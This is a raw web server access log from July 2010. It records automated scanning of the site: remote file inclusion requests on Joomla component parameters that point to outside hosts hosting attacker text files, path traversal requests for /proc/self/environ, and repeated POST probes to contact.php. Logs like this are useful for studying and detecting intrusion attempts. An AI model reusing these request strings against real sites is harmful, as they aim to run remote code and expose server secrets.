92.60.176.46 - - [05/Jul/2010:04:07:42 -0500] "GET /logs/access_log.1276646400/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:42 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:44 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:44 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:45 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:45 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:45 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:46 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:07:59 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:07:59 -0500] "GET /logs/access_log.1277251200/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:07:59 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:08:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:24 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:25 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:26 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:27 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:28 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:29 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:30 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:31 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:31 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:33 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:33 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:35 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:35 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:38 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:40 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:45 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:46 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:10:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:17:44 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:17:44 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:17:44 -0500] "GET /logs/access_log.1277251200/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:18:23 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:18:23 -0500] "GET /logs/access_log.1276819200%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:18:23 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
88.84.155.122 - - [05/Jul/2010:04:20:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.84.155.122 - - [05/Jul/2010:04:20:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.60.176.46 - - [05/Jul/2010:04:20:17 -0500] "GET /logs/access_log.1277251200%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
66.249.71.185 - - [05/Jul/2010:04:22:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.185 - - [05/Jul/2010:04:22:07 -0500] "GET /logs/access_log.1272499200 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.60.176.46 - - [05/Jul/2010:04:22:55 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:22:55 -0500] "GET /logs/access_log.1277164800%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:22:55 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:27:42 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:27:46 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:27:48 -0500] "GET /logs/access_log.1277251200/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""MaMa CaSpEr"
207.46.13.87 - - [05/Jul/2010:04:28:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.40.65.160 - - [05/Jul/2010:04:29:27 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.46.13.87 - - [05/Jul/2010:04:29:36 -0500] "GET /logs/access_log.1162512000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.60.176.46 - - [05/Jul/2010:04:30:08 -0500] "GET /logs/access_log.1277251200/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:30:08 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:30:08 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
66.40.65.160 - - [05/Jul/2010:04:30:30 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
92.60.176.46 - - [05/Jul/2010:04:31:48 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:31:50 -0500] "GET /logs/access_log.1276819200%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:31:50 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:31:51 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:31:51 -0500] "GET /logs/access_log.1276819200%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:31:52 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
66.40.65.160 - - [05/Jul/2010:04:32:12 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:32:41 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
92.60.176.46 - - [05/Jul/2010:04:33:04 -0500] "GET /logs/access_log.1277251200%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:33:23 -0500] "GET /logs/access_log.1277251200%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
67.195.112.180 - - [05/Jul/2010:04:38:55 -0500] "GET /logs/access_log.1271030400 HTTP/1.0" 200 643402 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.40.65.160 - - [05/Jul/2010:04:39:04 -0500] "GET /logs/access_log.1275091200//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:39:04 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:39:05 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:39:06 -0500] "GET /logs/access_log.1277424000//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
113.30.66.24 - - [05/Jul/2010:04:39:18 -0500] "GET /logs/access_log.1266710400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
113.30.66.24 - - [05/Jul/2010:04:39:18 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
113.30.66.24 - - [05/Jul/2010:04:39:18 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
84.243.214.52 - - [05/Jul/2010:04:39:55 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:55 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:55 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:55 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:55 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:55 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:39:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
207.46.199.54 - - [05/Jul/2010:04:44:33 -0500] "GET /logs/access_log.1208390400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.61.244.6 - - [05/Jul/2010:04:44:54 -0500] "GET /logs/access_log.1277424000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
72.30.142.216 - - [05/Jul/2010:04:45:29 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [05/Jul/2010:04:45:29 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.40.65.160 - - [05/Jul/2010:04:46:30 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:46:30 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
92.60.176.46 - - [05/Jul/2010:04:46:36 -0500] "GET /logs/access_log.1277164800%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:46:36 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:46:37 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
66.40.65.160 - - [05/Jul/2010:04:51:09 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:51:09 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:52:07 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:52:07 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:52:48 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:52:49 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:53:38 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:53:38 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
92.60.176.46 - - [05/Jul/2010:04:56:21 -0500] "GET /logs/access_log.1277164800%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:56:21 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:56:21 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:36 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:37 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:37 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.243.214.52 - - [05/Jul/2010:04:56:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
